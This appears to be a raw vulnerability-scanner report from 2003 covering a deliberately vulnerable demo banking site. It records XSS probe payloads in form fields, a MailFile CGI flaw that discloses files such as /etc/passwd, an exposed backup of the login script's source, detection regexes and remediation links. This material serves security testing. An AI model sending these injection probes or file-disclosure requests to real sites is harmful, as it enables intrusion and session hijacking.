<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /include/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:10 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (include)<B>Found Directory:</B> /include/ <p>
This folder usually contains .inc (include) files used for the website. Developers tend to leave sensitive information in these files.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dPOST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=</textarea><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 975
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was </textarea><script>alert('XSS')</script><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= </textarea><script>alert('XSS')</script><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack></textarea><script>alert('XSS')</script></attack><script>alert\('XSS'\)</script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3974
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3974
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Login FormA possible login form was found.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
type=['"]?password['"]?GET /cgi-bin/mailfile.cgi HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:41:59 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:02 GMT
ETag: "b4c3f1f8a9dc11:8f6"
Content-Length: 12
MAILFILE.CGIMailFile Arbitrary File Source Disclosure<A HREF="http://www.oatmeal-studios.com/Perl_Scripts/Mail_File/">MailFile</A> is a Perl CGI script used by a web site owner to allow visitors to e-mail files of their choice to an e-mail box of their choice. It has the following
features:
<UL><LI>Fully customizable HTML Form to match the look of your
site.
<LI>Very thorough documentation for both customization and
installation.
<LI>Script customization variables included in script.
<LI>Script checks for completeness of form and availability of
files.</UL>
The CGI contains a security vulnerability that enables attackers to
get a copy of any world readable file (for example /etc/passwd).GET /cgi-bin/<attack>mailfile.cgi</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |401GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=>"><script>alert("XSS")</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3982
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>>"><script>alert("XSS")</script></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=<attack>>"><script>alert("XSS")</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /login.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:51:33 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 05:45:31 GMT
ETag: "96256f86badc11:8f6"
Content-Length: 14611
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occurred"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write " <TABLE BGCOLOR='#ffffff' STYLE='border: 3px solid black'> "
Response.Write " <TR> "
Response.Write " <TD "
Response.Write " STYLE='border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3' "
Response.Write " HEIGHT='47' ROWSPAN='2' VALIGN='TOP'><IMG "
Response.Write " SRC='/images/freebank-logo2.gif' ALIGN='LEFT' BORDER='0' WIDTH='150' "
Response.Write " HEIGHT='50'><BR><BR></TD> "
